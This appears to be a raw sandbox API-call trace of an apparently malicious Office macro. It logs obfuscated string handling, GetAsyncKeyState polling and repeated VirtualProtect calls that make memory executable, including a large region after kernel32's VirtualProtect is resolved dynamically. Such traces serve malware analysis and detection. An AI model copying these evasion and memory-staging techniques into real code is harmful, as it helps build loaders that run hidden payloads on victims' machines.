0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0105.965] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0106.036] GetAsyncKeyState (vKey=3) returned 0 [0106.314] GetAsyncKeyState (vKey=3) returned 0 [0106.589] GetAsyncKeyState (vKey=3) returned 0 [0106.916] GetAsyncKeyState (vKey=3) returned 0 [0107.170] GetAsyncKeyState (vKey=3) returned 0 [0107.486] GetAsyncKeyState (vKey=3) returned 0 [0107.981] GetAsyncKeyState (vKey=3) returned 0 [0108.317] GetAsyncKeyState (vKey=3) returned 0 [0108.624] GetAsyncKeyState (vKey=3) returned 0 [0108.876] GetAsyncKeyState (vKey=3) returned 0 [0109.106] GetAsyncKeyState (vKey=3) returned 0 [0109.474] GetAsyncKeyState (vKey=3) returned 0 [0109.740] GetAsyncKeyState (vKey=3) returned 0 [0110.005] GetAsyncKeyState (vKey=3) returned 0 [0110.294] GetAsyncKeyState (vKey=3) returned 0 [0110.537] GetAsyncKeyState (vKey=3) returned 0 [0110.818] GetAsyncKeyState (vKey=3) returned 0 [0111.068] GetAsyncKeyState (vKey=3) returned 0 [0111.344] GetAsyncKeyState (vKey=3) returned 0 [0111.344] SafeArrayDestroyData (psa=0xc8482a0) returned 0x0 [0111.352] SafeArrayDestroyDescriptor (psa=0xc8482a0) returned 0x0 [0111.352] SafeArrayCopy (in: psa=0xc849350, ppsaOut=0x197c84 | out: ppsaOut=0x197c84) returned 0x0 [0111.382] SafeArrayCopy (in: psa=0xc8481b0, ppsaOut=0x197e98 | out: ppsaOut=0x197e98) returned 0x0 [0111.408] SafeArrayCopy (in: psa=0xc8490b0, ppsaOut=0x197ff4 | out: ppsaOut=0x197ff4) returned 0x0 [0111.455] CRetailMalloc_Alloc () returned 0xcae1fd8 [0111.455] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0111.455] memcpy (in: _Dst=0xaf5270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0111.455] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0111.455] memcpy (in: _Dst=0xaf5168, _Src=0x1978a4, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0111.455] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x96\x96\x96\x96\x97\x96\x97\x97", cchCount2=-1) returned 3 [0111.455] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x96\x96\x96\x96\x97\x96\x97\x97", cchCount2=-1) returned 3 [0111.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52ec2, cbMultiByte=26, lpWideCharStr=0x1976c4, cchWideChar=27 | out: lpWideCharStr="––—––––—–——–—––——––––—–——") returned 26 [0111.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d104fe, cbMultiByte=26, lpWideCharStr=0x197724, cchWideChar=27 | out: lpWideCharStr="––—––––—–——–—––——––––—–——") returned 26 [0111.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d104fe, cbMultiByte=26, lpWideCharStr=0x197724, cchWideChar=27 | out: lpWideCharStr="––—––––—–——–—––——––––—–——") returned 26 [0111.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d104fe, cbMultiByte=26, lpWideCharStr=0x197724, cchWideChar=27 | out: lpWideCharStr="––—––––—–——–—––——––––—–——") returned 26 [0111.456] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x97\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x96\x96\x96\x96\x97\x96\x97\x97", cchCount2=-1) returned 3 [0111.456] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96\x96\x97\x97\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x96\x96\x96\x96\x97\x96\x97\x97", cchCount2=-1) returned 3 [0111.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d104fe, cbMultiByte=26, lpWideCharStr=0x197724, cchWideChar=27 | out: lpWideCharStr="––—––––—–——–—––——––––—–——") returned 26 [0111.456] CRetailMalloc_Alloc () returned 0xc8491f0 [0111.456] _mbscpy_s (in: _Dst=0xc8491f0, _DstSizeInBytes=0x1a, _Src=0x9d104fe | out: _Dst=0xc8491f0) returned 0x0 [0111.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10c2e, cbMultiByte=33, lpWideCharStr=0x197734, cchWideChar=34 | out: lpWideCharStr="_B_var_––—––––—–——–—––——––––—–——") returned 33 [0111.457] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x1a, _Src=0x9d104fe | out: _Dst=0x19779c) returned 0x0 [0111.457] CRetailMalloc_Free () returned 0x1 [0111.457] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0111.457] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0111.457] memcpy (in: _Dst=0xaf516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0111.457] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0111.457] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0111.457] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0111.457] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0111.457] memcpy (in: _Dst=0xcae1ffa, _Src=0x197878, _Size=0x1 | out: _Dst=0xcae1ffa) returned 0xcae1ffa [0111.457] memcpy (in: _Dst=0xcae2050, _Src=0x197944, _Size=0x18 | out: _Dst=0xcae2050) returned 0xcae2050 [0111.457] CRetailMalloc_Realloc () returned 0xcae1fd8 [0111.457] CRetailMalloc_Free () returned 0x1 [0111.457] GetCurrentProcess () returned 0xffffffff [0111.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0111.457] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.458] GetCurrentProcess () returned 0xffffffff [0111.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0111.458] GetCurrentProcess () returned 0xffffffff [0111.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0111.458] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.458] GetCurrentProcess () returned 0xffffffff [0111.458] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0111.458] GetCurrentProcess () returned 0xffffffff [0111.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0111.459] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.459] GetCurrentProcess () returned 0xffffffff [0111.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0111.459] GetCurrentProcess () returned 0xffffffff [0111.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0111.459] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.460] GetCurrentProcess () returned 0xffffffff [0111.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0111.460] GetCurrentProcess () returned 0xffffffff [0111.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0111.460] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.460] GetCurrentProcess () returned 0xffffffff [0111.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0111.460] GetCurrentProcess () returned 0xffffffff [0111.460] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0111.460] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.461] GetCurrentProcess () returned 0xffffffff [0111.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0111.461] GetCurrentProcess () returned 0xffffffff [0111.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0111.461] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.462] GetCurrentProcess () returned 0xffffffff [0111.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0111.462] GetCurrentProcess () returned 0xffffffff [0111.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0111.462] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.462] GetCurrentProcess () returned 0xffffffff [0111.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0111.462] GetCurrentProcess () returned 0xffffffff [0111.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0111.462] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.463] GetCurrentProcess () returned 0xffffffff [0111.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0111.463] GetCurrentProcess () returned 0xffffffff [0111.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0111.463] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.463] GetCurrentProcess () returned 0xffffffff [0111.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0111.463] GetCurrentProcess () returned 0xffffffff [0111.463] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0111.464] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.464] GetCurrentProcess () returned 0xffffffff [0111.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0111.464] GetCurrentProcess () returned 0xffffffff [0111.464] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0111.464] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.466] GetCurrentProcess () returned 0xffffffff [0111.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0111.466] GetCurrentProcess () returned 0xffffffff [0111.466] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0111.467] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.467] GetCurrentProcess () returned 0xffffffff [0111.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0111.467] GetCurrentProcess () returned 0xffffffff [0111.467] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0111.467] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.468] GetCurrentProcess () returned 0xffffffff [0111.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0111.468] GetCurrentProcess () returned 0xffffffff [0111.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0111.468] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.468] GetCurrentProcess () returned 0xffffffff [0111.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0111.468] GetCurrentProcess () returned 0xffffffff [0111.468] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0111.468] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.469] GetCurrentProcess () returned 0xffffffff [0111.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0111.469] GetCurrentProcess () returned 0xffffffff [0111.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0111.469] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.469] GetCurrentProcess () returned 0xffffffff [0111.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0111.469] GetCurrentProcess () returned 0xffffffff [0111.469] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0111.469] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.470] GetCurrentProcess () returned 0xffffffff [0111.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0111.470] GetCurrentProcess () returned 0xffffffff [0111.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0111.470] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.470] GetCurrentProcess () returned 0xffffffff [0111.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0111.470] GetCurrentProcess () returned 0xffffffff [0111.470] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0111.470] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.471] GetCurrentProcess () returned 0xffffffff [0111.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0111.471] GetCurrentProcess () returned 0xffffffff [0111.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0111.471] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.472] GetCurrentProcess () returned 0xffffffff [0111.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0111.472] GetCurrentProcess () returned 0xffffffff [0111.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0111.472] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.472] GetCurrentProcess () returned 0xffffffff [0111.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0111.472] GetCurrentProcess () returned 0xffffffff [0111.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0111.472] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.473] GetCurrentProcess () returned 0xffffffff [0111.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0111.473] GetCurrentProcess () returned 0xffffffff [0111.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0111.473] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.473] GetCurrentProcess () returned 0xffffffff [0111.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0111.473] GetCurrentProcess () returned 0xffffffff [0111.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0111.473] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.474] GetCurrentProcess () returned 0xffffffff [0111.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0111.474] GetCurrentProcess () returned 0xffffffff [0111.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0111.474] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.474] GetCurrentProcess () returned 0xffffffff [0111.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0111.474] GetCurrentProcess () returned 0xffffffff [0111.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0111.474] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.475] GetCurrentProcess () returned 0xffffffff [0111.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0111.475] GetCurrentProcess () returned 0xffffffff [0111.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0111.475] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.475] GetCurrentProcess () returned 0xffffffff [0111.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0111.475] GetCurrentProcess () returned 0xffffffff [0111.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0111.475] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.476] GetCurrentProcess () returned 0xffffffff [0111.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0111.476] GetCurrentProcess () returned 0xffffffff [0111.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0111.476] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.477] GetCurrentProcess () returned 0xffffffff [0111.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0111.477] GetCurrentProcess () returned 0xffffffff [0111.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0111.477] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.477] GetCurrentProcess () returned 0xffffffff [0111.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0111.478] GetAsyncKeyState (vKey=3) returned 0 [0111.478] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.478] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.478] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.478] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.478] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.478] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0111.478] VarAdd (in: pvarLeft=0x198068, pvarRight=0x198018, pvarResult=0x198048 | out: pvarResult=0x198048) returned 0x0 [0111.479] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.479] _stricmp (_Str1="kernel32", _Str2="VBE6.DLL") returned -11 [0111.479] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0111.479] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.479] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0111.480] VirtualProtect (in: lpAddress=0x11944020, dwSize=0x15fab2, flNewProtect=0x40, lpflOldProtect=0x197fdc | out: lpflOldProtect=0x197fdc*=0x4) returned 1 [0112.020] GetLastError () returned 0x5 [0112.020] GetAsyncKeyState (vKey=3) returned 0 [0112.023] CRetailMalloc_Alloc () returned 0xcae20a0 [0112.023] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.023] memcpy (in: _Dst=0xaf5270, _Src=0x1978a4, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0112.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2da47e, cbMultiByte=10, lpWideCharStr=0x9eb0228, cchWideChar=22 | out: lpWideCharStr="QuK7dcBfpW") returned 10 [0112.023] CRetailMalloc_Alloc () returned 0xcaf0050 [0112.023] memcpy (in: _Dst=0xcaf0064, _Src=0x9eb0224, _Size=0x1a | out: _Dst=0xcaf0064) returned 0xcaf0064 [0112.023] memcpy (in: _Dst=0xaf5168, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.023] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.023] memcpy (in: _Dst=0xaf5168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.023] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0112.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2da498, cbMultiByte=9, lpWideCharStr=0x9eb0932, cchWideChar=20 | out: lpWideCharStr="OIMV0bDaM") returned 9 [0112.023] memcpy (in: _Dst=0xcaf0084, _Src=0x9eb092e, _Size=0x18 | out: _Dst=0xcaf0084) returned 0xcaf0084 [0112.023] memcpy (in: _Dst=0xaf516c, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0112.023] memcpy (in: _Dst=0xaf516c, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0112.024] memcpy (in: _Dst=0xaf5170, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5170) returned 0xaf5170 [0112.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb2da4b0, cbMultiByte=10, lpWideCharStr=0x9eb0cd2, cchWideChar=22 | out: lpWideCharStr="KZbZMTgSv5") returned 10 [0112.024] memcpy (in: _Dst=0xcaf00a0, _Src=0x9eb0cce, _Size=0x1a | out: _Dst=0xcaf00a0) returned 0xcaf00a0 [0112.024] memcpy (in: _Dst=0xaf5174, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0112.024] memcpy (in: _Dst=0xaf5174, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5174) returned 0xaf5174 [0112.024] memcpy (in: _Dst=0x1976cc, _Src=0x197740, _Size=0x8 | out: _Dst=0x1976cc) returned 0x1976cc [0112.024] memcpy (in: _Dst=0xcad46a0, _Src=0x1976cc, _Size=0x8 | out: _Dst=0xcad46a0) returned 0xcad46a0 [0112.024] CRetailMalloc_Alloc () returned 0xcadaf10 [0112.024] CRetailMalloc_Free () returned 0x1 [0112.024] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 